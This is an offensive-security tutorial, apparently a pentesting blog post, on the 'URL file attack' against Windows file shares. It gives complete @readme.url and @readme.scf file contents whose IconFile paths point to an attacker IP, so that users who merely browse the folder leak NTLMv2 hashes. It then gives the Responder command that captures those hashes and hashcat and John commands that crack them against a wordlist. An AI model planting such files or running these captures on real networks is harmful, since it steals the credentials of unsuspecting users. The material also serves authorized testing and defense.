A URL file attack captures account hashes via a user accessing a folder that contains a specially crafted file that forces the user to request an icon off the attackers machine. The resource does not exist though. The act of initiating a connection to the attackers machine is how the hash is captured. Also note that the user does not need to open the file, nor is their any indication that anything has happened behind the scenes. They just need to open the folder that the file is located in which makes this a perfect for shared folders.

This attack is only applicable to intranet communication and does not work with outside network.

This is a post compromise attack and following are the conditions

  • There is a file share accessible across the network
  • Attacker has compromised at least one machine which has access to the file share with write permissions

1. Create The File

The file name must begin with either a “@” symbol or a “~” symbol and the filetype must be “url”. Example: “@readme.url”

2. Contents of the file

[InternetShortcut]
URL=http://google.com
WorkingDirectory=%username%
IconFile=\\<attacker IP>\%USERNAME%.icon
IconIndex=1

Extra

The same can be done with an scf file. Example: @readme.scf

[Shell]
Command=2
IconFile=\\<attacker IP>\Share\test.ico
[Taskbar]
Command=ToggleDesktop

Explanation

  • [InternetShortcut] is a header line that specifies the file type and indicates that the following lines are instructions for an internet shortcut
  • URL=anyurl specifies the URL of the website or web page that the shortcut should launch. The actual URL should be provided in place of the “anyurl” placeholder
  • WorkingDirectory=anydir specifies the default working directory for the shortcut. In most cases, this will be the directory in which the shortcut file is located. You can replace the “anydir” placeholder with the full path of the directory, if necessary
  • IconFile=\\x.x.x.x\%USERNAME%.icon specifies the location of the icon file to use for the shortcut. The icon file can be stored on a remote computer, which is specified by the IP address “x.x.x.x”. The “%USERNAME%” placeholder is replaced with the current user’s username. The “.icon” extension specifies the type of file that contains the icon data
  • IconIndex=1 specifies which icon in the specified icon file should be used for the shortcut. In this case, the number “1” references to the first icon in the file for use. If the icon file contains multiple icons, choose the number accordingly to select a different icon

Exploitation

1. Connect to a share and drop the file (.url or .scf) (@readme.url or @readme.scf) @ in the name sets the file at the top, make sure the file has the proper file type

2. Start responder with HTTP and SMB is turned ON

  • sudo responder -I eth0 -w -b -v -F

3. Wait for someone to connect to the share, and, you’ll get data back

Cracking with hashcat

1. Identify the hash type number using (https://hashcat.net/wiki/doku.php?id=example_hashes)

  • search NTLMv2

https://vk9-sec.com/wp-content/uploads/2020/06/word-image-2673-17.png

2. Knowing the hash ID from https://hashcat.net/ we can proceed to use the hash file, and a wordlist

  • hashcat -m 5600 hash.txt /usr/share/wordlists/rockyou.txt

https://vk9-sec.com/wp-content/uploads/2020/06/word-image-2673-18.png

Note: as you can see Status: Cracked, and the password is displayed next to the hash, Password: Kyuubi123

Cracking using John

1. Identify the hash type using --list=format

  • john --list=formats | awk -F", " '{for (i=1; i<=NF; i++) print $i}' | grep -i ntlm

https://vk9-sec.com/wp-content/uploads/2020/06/word-image-2673-19.png

2. Run john against our hash file, set the hash type and the wordlist

  • john --wordlist=/usr/share/wordlists/rockyou.txt --format=netntlmv2 hash.txt

https://vk9-sec.com/wp-content/uploads/2020/06/word-image-2673-20.png

Source

https://swepstopia.com/url-file-attack/

https://www.hackingloops.com/url-file-attack-and-printnightmare/

https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Active%20Directory%20Attack.md#scf-and-url-file-attack-against-writeable-share

https://zsecurity.org/url-file-attacks-active-directory-pentesting/

https://www.sevenlayers.com/index.php/blog/494-url-file-attacks